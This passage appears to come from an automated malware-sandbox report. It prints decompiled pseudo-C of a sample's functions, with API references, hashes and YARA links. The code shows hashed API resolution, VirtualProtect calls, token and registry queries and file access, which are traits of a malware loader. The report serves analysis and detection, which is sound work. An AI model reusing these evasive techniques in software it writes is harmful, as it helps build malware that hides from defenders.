						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E025D2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x025d221f
0x025d222d
0x025d2234
0x025d2237
0x025d2241
0x025d2248
0x025d2252
0x025d2258
0x025d2261
0x025d226a
0x025d226d
0x025d2273
0x025d2277
0x025d227f
0x025d2283
0x025d2286
0x025d2289
0x025d228c
0x025d228f
0x025d22a9
0x025d22af
0x025d22b2
0x025d22ba
0x025d22be
0x025d22c1
0x025d22c4
0x025d22c7
0x025d22ca
0x025d22e6
0x025d2303
0x025d2328
0x025d232a
0x025d2333
0x025d2336
0x025d2340
0x025d2343
0x025d2346
0x025d2349
0x025d234c
0x025d23a4
0x025d23a4
0x025d254a
0x025d2550
0x025d244d
0x025d2453
0x025d249f
0x025d249f
0x025d24bc
0x025d24e2
0x025d24f0
0x025d24f3
0x025d24f7
0x025d24fb
0x025d2502
0x025d2508
0x025d250a
0x025d251c
0x025d2524
0x025d252a
0x025d2530
0x025d2536
0x00000000
0x00000000
0x025d253c
0x025d249f
0x025d245b
0x025d2469
0x025d2471
0x025d2474
0x025d2476
0x025d247c
0x025d2488
0x025d248e
0x025d2491
0x025d2494
0x025d238a
0x025d238a
0x025d23d8
0x025d23de
0x025d23e4
0x025d23ea
0x025d23f0
0x025d23f5
0x025d23fb
0x025d23fe
0x025d2401
0x025d2409
0x025d2411
0x025d2414
0x025d2417
0x025d241d
0x025d2423
0x025d242e
0x025d2362
0x025d2368
0x025d2368
0x025d23c5

APIs

VirtualProtect.KERNELBASE ref: 025D228F
VirtualProtect.KERNELBASE ref: 025D2328

Strings

t, xrefs: 025D2409

Memory Dump Source

Source File: 00000002.00000002.616008075.00000000025D0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 283309e85e69a4c3909cb6b86322781f3c6df83554d3c26f1bc9ed90511e835d
Instruction ID: 493c5dd899048f8dd60df7c4b5daa1fc8143d0deccd1e9c0785f79bdb022054d
Opcode Fuzzy Hash: 283309e85e69a4c3909cb6b86322781f3c6df83554d3c26f1bc9ed90511e835d
Instruction Fuzzy Hash: F981A9B4E042089FCB14CF99C180A9DFBF1FF88310F65856AE958AB352D330A985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 73335DF0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73335DF0(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E7332C33C(_t19) == 0) {
					_t2 =  &_a8; // 0x73335ce5
					_v12 =  *_t2;
					if(E73332F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E7333352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x73335df3
0x73335df5
0x73335e01
0x73335e07
0x73335e0b
0x73335e21
0x73335e40
0x73335e23
0x73335e34
0x73335e38
0x73335e58
0x73335e3a
0x73335e3a
0x73335e3a
0x73335e38
0x73335e41
0x73335e46
0x73335e4f
0x73335e48
0x73335e48
0x73335e4a
0x73335e4a
0x73335e03
0x73335e03
0x73335e03
0x73335e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,73335CE5,00000000,?,00000000,?), ref: 73335E34

Strings

\3s, xrefs: 73335E07

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: \3s
API String ID: 2738559852-1939772180
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: 287f9566ed4c081322e0fb341ff3ff0fce476be792ef35bc9b48025651f27cb4
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: 35F081B1209606AFFB219E25CC40BEA7BE9AF46250F50CC2FA89AD2164EA21D4448625

Uniqueness

Uniqueness Score: -1.00%

Function 73331140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E73331140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E73332F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E7332C33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E7332BC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E73332F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E7332F620( &_v32, _t24);
						_t54 = E7332F558( &(_t59[3]), 0);
						if(E73332F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L14:
							E7332F6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L14;
							} else {
								_t33 = E73332F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L14;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x73331142
0x7333114f
0x73331151
0x73331160
0x73331164
0x7333116e
0x7333116e
0x73331174
0x73331177
0x73331179
0x73331184
0x733311be
0x733311c3
0x733311c8
0x733311c8
0x733311d4
0x73331186
0x73331190
0x733311a3
0x733311b4
0x733311b4
0x733311b6
0x733311bc
0x733311da
0x733311ea
0x73331201
0x733312e3
0x733312e7
0x00000000
0x73331207
0x73331217
0x7333121b
0x00000000
0x73331221
0x7333122d
0x73331234
0x00000000
0x7333123a
0x7333123a
0x7333123c
0x7333123d
0x7333123d
0x73331234
0x7333121b
0x00000000
0x00000000
0x00000000
0x733311bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 733311B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 73331217

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: bdd1ae6e1b65b2373de1414120bedff7707724bf0eb50e282f9a494f94f94024
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction Fuzzy Hash: 33219C70E083066FFB25EA29CC00FAB77AD9FD6601F54C828B445C6290EF34C80AC761

Uniqueness

Uniqueness Score: -1.00%

Function 73335720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E73335720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E73332F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E7332F8C4(_a8, _t15);
							if(E73332F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E7332F558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x73335724
0x73335725
0x73335727
0x7333572c
0x73335733
0x73335737
0x73335737
0x73335737
0x7333573b
0x73335781
0x73335781
0x7333573d
0x7333573d
0x73335743
0x7333574c
0x7333574f
0x73335766
0x73335777
0x73335777
0x73335779
0x7333577f
0x7333578a
0x733357a2
0x733357c2
0x733357c2
0x733357c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73335743
0x733357cc

APIs

RegQueryValueExA.KERNELBASE(?,7333D1F8,00000000,?,00000000,00000000,?,?,?,7333D1F8,?,733357F3,?,00000000,00000000), ref: 73335777
RegQueryValueExA.KERNELBASE(?,7333D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,7333D1F8,?,733357F3,?,00000000), ref: 733357C2

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: c5c86f81f741457882f5a7618415ead627ae87d3edf998a9b2a4340be6953f50
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: 9E11D3B1609309FFF635DE25DC80FABBFECDF82655F44851EF48697180DA20E80196A1

Uniqueness

Uniqueness Score: -1.00%

Function 73335AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E73335AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E7332D288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E7332D78C(__ecx, _t66);
					E7332D0B4(_t58,  *_t66);
					E7332D098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E7333621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E73332F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E7332C328(_t40);
				if(E7332C33C(_t40) != 0) {
					_t58[2] = E7333352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E73332F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E733335D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E73332F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x73335aa8
0x73335aab
0x73335aac
0x73335aaf
0x73335ab1
0x73335abe
0x73335ac2
0x73335ac6
0x73335ad0
0x73335ad7
0x73335ad7
0x73335ade
0x73335ae0
0x73335ae5
0x73335aee
0x73335af6
0x73335af6
0x73335ae7
0x73335ae9
0x73335ae9
0x73335ae5
0x73335afb
0x73335b07
0x73335b1d
0x73335b1d
0x73335c38
0x73335b75
0x73335b7e
0x73335b7f
0x73335b84
0x73335b85
0x73335b77
0x73335b79
0x73335b79
0x73335b9b
0x73335baf
0x73335b9d
0x73335baa
0x73335bac
0x73335bac
0x73335bb1
0x73335bb6
0x73335bc4
0x73335c2f
0x73335c32
0x00000000
0x73335bc6
0x73335bcb
0x73335c18
0x73335c1a
0x73335c1c
0x73335c26
0x73335c26
0x73335c1c
0x73335bcd
0x73335bd9
0x73335bde
0x73335beb
0x73335bf2
0x73335bfe
0x73335bfe
0x73335bff
0x73335c06
0x73335bf4
0x73335bf4
0x73335bf5
0x73335bf6
0x73335bf8
0x73335bfa
0x73335bfb
0x73335bfb
0x73335bf2

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b73122391448c54ae64dfc271b7185c41db2f886902f0777a803ef6b5a185f
Instruction ID: 589f35021f1a5c6592abec79650d7d55343a7b9241b1388e4408245214e9f264
Opcode Fuzzy Hash: 60b73122391448c54ae64dfc271b7185c41db2f886902f0777a803ef6b5a185f
Instruction Fuzzy Hash: 3831F7B1744306AFF7312A708C80F3B7EEEEF83245F84C92EF946D6181DA6189158265

Uniqueness

Uniqueness Score: -1.00%

Function 025D2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 025D2508

Memory Dump Source

Source File: 00000002.00000002.616008075.00000000025D0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f07dcc56fc340db73b583a6ecff042aa12a136e1d4475c1f41af9e1d8ecbd2dc
Instruction ID: 577dcaaa67d10421e51ed65ab4211e8650627fdb5ceeb1521a44e4d156e68c6c
Opcode Fuzzy Hash: f07dcc56fc340db73b583a6ecff042aa12a136e1d4475c1f41af9e1d8ecbd2dc
Instruction Fuzzy Hash: C831E8B5D102288FDB24CF68C98069DB7F1BF88204F558699D94CA7306D731AE91CF81

Uniqueness

Uniqueness Score: -1.00%

Function 73335B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E73335B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E73332F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E7332C328(_t24);
					if(E7332C33C(_t24) != 0) {
						_t33[2] = E7333352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E73332F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E733335D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E73332F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x73335b51
0x73335b53
0x73335b6a
0x73335b75
0x73335b7e
0x73335b84
0x73335b85
0x73335b77
0x73335b79
0x73335b79
0x73335b9b
0x73335baf
0x73335b9d
0x73335baa
0x73335bac
0x73335bac
0x73335bb1
0x73335bb6
0x73335bc4
0x73335c2f
0x73335c32
0x00000000
0x73335bc6
0x73335bcb
0x73335c18
0x73335c1c
0x73335c26
0x73335c26
0x73335c1c
0x73335bcd
0x73335bd9
0x73335bde
0x73335beb
0x73335bf2
0x73335bfe
0x00000000
0x73335bf4
0x73335bf4
0x73335bf5
0x73335bf6
0x73335bf8
0x73335bfa
0x73335bfb
0x73335bfb
0x73335bf2
0x73335b55
0x73335b55
0x73335b5c
0x73335bff
0x73335c06
0x73335c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73335BAA

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: 98c09172398744ae15e99ed8cd932e2d30176da7adcb6f98b70fb79385110074
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: 3901F5B5780306BBFB3116108C81F3BBF6EEF83255F94C96AF942A60C5DB7294198271

Uniqueness

Uniqueness Score: -1.00%

Function 73335B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E73335B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E73332F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7332C328(_t24);
				if(E7332C33C(_t24) != 0) {
					_t34[2] = E7333352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E73332F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E733335D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E73332F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x73335b29
0x73335b2d
0x73335b30
0x73335b33
0x73335b75
0x73335b7e
0x73335b84
0x73335b85
0x73335b77
0x73335b79
0x73335b79
0x73335b9b
0x73335baf
0x73335b9d
0x73335baa
0x73335bac
0x73335bac
0x73335bb1
0x73335bb6
0x73335bc4
0x73335c2f
0x73335c32
0x00000000
0x73335bc6
0x73335bcb
0x73335c18
0x73335c1c
0x73335c26
0x73335c26
0x73335c1c
0x73335bcd
0x73335bd9
0x73335bde
0x73335beb
0x73335bf2
0x73335bfe
0x73335bff
0x73335c06
0x73335bf4
0x73335bf4
0x73335bf5
0x73335bf6
0x73335bf8
0x73335bfa
0x73335bfb
0x73335bfb
0x73335bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73335BAA

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: c0dae738031c1d755ff58d4e09dad73360c29eb341223e25466683ba5b04578b
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: 4101DBB1780307BBFB3116508C81F3B7EADDFC3255F85C96AB986660C5DF6198598131

Uniqueness

Uniqueness Score: -1.00%

Function 73335B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E73335B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E73332F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7332C328(_t24);
				if(E7332C33C(_t24) != 0) {
					_t34[2] = E7333352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E73332F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E733335D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E73332F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x73335b3d
0x73335b44
0x73335b47
0x73335b75
0x73335b7e
0x73335b84
0x73335b85
0x73335b77
0x73335b79
0x73335b79
0x73335b9b
0x73335baf
0x73335b9d
0x73335baa
0x73335bac
0x73335bac
0x73335bb1
0x73335bb6
0x73335bc4
0x73335c2f
0x73335c32
0x00000000
0x73335bc6
0x73335bcb
0x73335c18
0x73335c1c
0x73335c26
0x73335c26
0x73335c1c
0x73335bcd
0x73335bd9
0x73335bde
0x73335beb
0x73335bf2
0x73335bfe
0x73335bff
0x73335c06
0x73335bf4
0x73335bf4
0x73335bf5
0x73335bf6
0x73335bf8
0x73335bfa
0x73335bfb
0x73335bfb
0x73335bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73335BAA

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: 07edb20c4e48a57ba10092abaf1a7a3b28fd39877b7418f2c2556d45b5fefc68
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: 5501DBA47403077BFB3116118C81F3F7E9EDF83255F84C96AB986A60C5DF7598598121

Uniqueness

Uniqueness Score: -1.00%

Function 73335B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E73335B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E73332F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7332C328(_t23);
				if(E7332C33C(_t23) != 0) {
					_t31[2] = E7333352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E73332F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E733335D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E73332F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
